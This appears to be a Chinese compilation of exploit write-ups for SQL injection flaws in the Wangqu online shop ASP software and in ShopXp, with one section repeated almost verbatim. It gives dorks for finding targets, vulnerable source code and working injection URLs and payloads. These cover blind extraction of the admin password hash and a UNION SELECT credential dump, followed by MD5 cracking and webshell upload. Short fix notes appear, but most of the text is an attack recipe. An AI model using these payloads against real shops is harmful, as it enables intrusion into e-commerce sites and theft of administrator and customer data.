下面是小编为大家整理的网趣网上购物系统时尚版10.3注入漏洞漏洞预警(共含7篇),仅供大家参考借鉴,希望大家喜欢,并能积极分享!同时,但愿您也能像本文投稿人“熊猫神父”一样,积极向本站投稿分享好文章。
网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,
漏洞:文件editorderform.asp,存在sql注入漏洞
关键字:inurl:trends.asp?id=
利用前提:注册用户下定单
分析:
源码如下:
<%dim zhuangtai,namekey
namekey=trim(request(“namekey”)) 只是单单过滤了空格而已
zhuangtai=trim(request(“zhuangtai”))
if zhuangtai=“” then zhuangtai=request.QueryString(“zhuangtai”)
if namekey=“” then namekey=request.querystring(“namekey”)
%>
………………
'//按用户查询
if zhuangtai=0 or zhuangtai=“” then
rs.open “select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username='”&namekey&“' order by actiondate desc”,conn,1,1
else
rs.open “select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=”&zhuangtai&“ and username='”&namekey&“' order by actiondate”,conn,1,1
end if
admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,
利用如下:
首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。
如图:
好了,定单号产生,那么,我们接着就直接打开网站
www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing
其中的namekey=qing,qing替换成你注册的用户名,
把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:
好了,拿着跑出来的密码去cmd5解一下,再登录后台,
后台拿shell的话,备份和上传那里都可以,我就不详说了。
网趣可以改名成洞趣了
网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入,导致管理员密码被注入暴MD5漏洞,
漏洞:文件editorderform.asp,存在sql注入漏洞
关键字:inurl:trends.asp?id=
利用前提:注册用户下定单
分析:
源码如下:
<%dim zhuangtai,namekey
namekey=trim(request(“namekey”)) 只是单单过滤了空格而已
zhuangtai=trim(request(“zhuangtai”))
if zhuangtai=“” then zhuangtai=request.QueryString(“zhuangtai”)
if namekey=“” then namekey=request.querystring(“namekey”)
%>
………………
//按用户查询
if zhuangtai=0 or zhuangtai=“” then
rs.open “select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai<6 and username=”&namekey&“ order by actiondate desc”,conn,1,1
else
rs.open “select distinct(dingdan),userid,userzhenshiname,actiondate,songhuofangshi,zhifufangshi,zhuangtai from orders where zhuangtai=”&zhuangtai&“ and username=”&namekey&“ order by actiondate”,conn,1,1
end if
admin目录下的editorderform.asp文件未做session验证,且对namekey过滤不严,直接导入查询产生SQL注入漏洞,
利用如下:
首先注册一个用户,随便找一样东西购买下一个定单,产生一个定单号。
如图:
好了,定单号产生,那么,我们接着就直接打开网站
www.chinasg.tk/admin/editorderform.asp?zhuangtai=0&namekey=qing
其中的namekey=qing,qing替换成你注册的用户名,
把这个URL放到NBSI当中,关键字为“1笔”,手动添加表名cnhww,结果如图所示:
好了,拿着跑出来的密码去cmd5解一下,再登录后台,
后台拿shell的话,备份和上传那里都可以,我就不详说了。
修复方案:
对admin目录下的editorderform.asp文件做session验证,对namekey严格过滤
Cool Kid 's blog
涉及版本:网趣网上购物系统时尚版 v3.2
漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp
漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.
关键代码:
ASP代码
<%
username=request.form(“username”)
set rs=Server.CreateObject(“Adodb.Recordset”)
sql=“select * from [user] where username='”&username“' ”
rs.open sql,conn,1,1
If rs.eof Then
%>
<%
End If
%>
取回密码 | 回答问题
利用方法:
post提交数据(可以借用剑心的Sql.htm[www.loveshell.net/blog/blogview.asp?logID=70]),默认管理员ID为4,密码为16位md5(小写字母),确定下范围0-9的asc值48-57,小写字母的asc值97-122
SQL代码
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)0 and ''='
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)0 and ''='
正确返回“取回密码”,错误返回对话框“这个用户没有注册,请注册!”
简要描述:
参数未作任何过滤直接带入数据库查询,恶意攻击者可以获取管理后台登陆用户名和密码
详细说明:
web根目录下price.asp中,anid未作任何过滤,数字型注入
地址:127.0.0.1/price.asp?anid=63
anid的值视具体用户而定
可以添加cnhww表爆之
源码包地址:down.chinaz.com/soft/30676.htm
漏洞证明:
修复方案:
anid=trim(request(“anid”))修改为:anid=IsNumeric(trim(request(“anid”)))
版本:网趣网上购物系统旗舰版(免费版)
下载:www.cnhww.com/down.asp?id=6
----------------------------------------------------------------------
第一处:
/research.asp
对selectname未进行任何过滤,造成搜索型注入
code:
7-12行
dim action,searchkey,anclassid,jiage,selectnameanclassid=request(“anclassid”)searchkey=request(“searchkey”)jiage=request(“jiage”)action=request(“action”)selectname=request(“selectname”)
//获取selectname,中间无任何过滤212-230行
ifanclassid0thenselectcaseactioncase“1”sql1=“ bookname like '%”&searchkey&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”&jiage&“ or vipjia<”&jiage&“) andanclassid=”&anclassid&“ ”case“2”sql1=“ pingpai like '%”&selectname&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”
&jiage&“ or vipjia<”&jiage&“) andanclassid=”&anclassid&“ ”case“3”sql1=“ bookcontent like '%”&selectname&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”&jiage&“ or vipjia<”&jiage&“) andanclassid=”&anclassid&“ ”endselectelseselectcaseactioncase“1”sql1=“ bookname like '%”&searchkey&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”&jiage&“ or vipjia<”&jiage&“) ”case“2”sql1=“ pingpai like '%”&selectname&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”&jiage&“ or vipjia<”&jiage&“) ”//我利用的是此处case“3”sql1=“ bookcontent like '%”&selectname&“%' and (shichangjia<”&jiage&“ or huiyuanjia<”&jiage&“ or vipjia<”&jiage&“) ”endselectendif234行
rs.open“select * from products where ”&sql1&“ and zhuangtai=0 order by adddate desc”,conn,1,1
构造:
127.0.0.1:8080/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='
--------------------------------------------------------------------
第二处:
/price.asp
对anid未进行任何过滤,造成数字型注入
code:
74行:
anid=trim(request
(“anid”))//获取anid,中间无任何过滤104行:
ifanid“”thenrs.open“select * from products where anclassid=”&anid&“ order by adddate desc”,conn,1,1
构造:
127.0.0.1:8080/price.asp?anid=62 and 1=1
---------------------------------------------------------------------
第三处:
/order.asp
对dan未进行任何过滤,造成字符型注入
code:
64行:
dingdan=request.QueryString(“dan”)//获取dan,中间无任何过滤
66行:
rs.
open“selectproducts.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,orders.danjia,orders.feiyong,orders.******,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liuyan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuo ,orders.bookcount from products inner join orders on products.bookid=orders.bookid whereorders.username='”&request.cookies(“Cnhww”)(“username”)&“' and dingdan='”&dingdan&“' ”,conn,1,1构造:
下笔订单先,否者无法利用
127.0.0.1:8080/order.asp?dan=77143453' and '1'='1
----------------------------------------------------------------------
第四处:
/my_msg.asp
对delid未进行任何过滤(我用的免费版,无法测试,不过有很大可能存在该漏洞)
----------------------------------------------------------------------
关键字:inurl:shopxp_news.asp
注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb1481eca94b12f75 =====admin b1481eca94b12f75(38983806 )
后台:/admin 或者/admin_shopxp
拿webshell方法:把小马改为图片格式后缀准备上传,利用数据库备份搞定webshell
局限性很大,也是后台某个文件没做过滤,
所以啊,很多站改了后台,所以也没用。
EXP:
ShopXp Oday
复制,粘贴,保存为.html文件
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
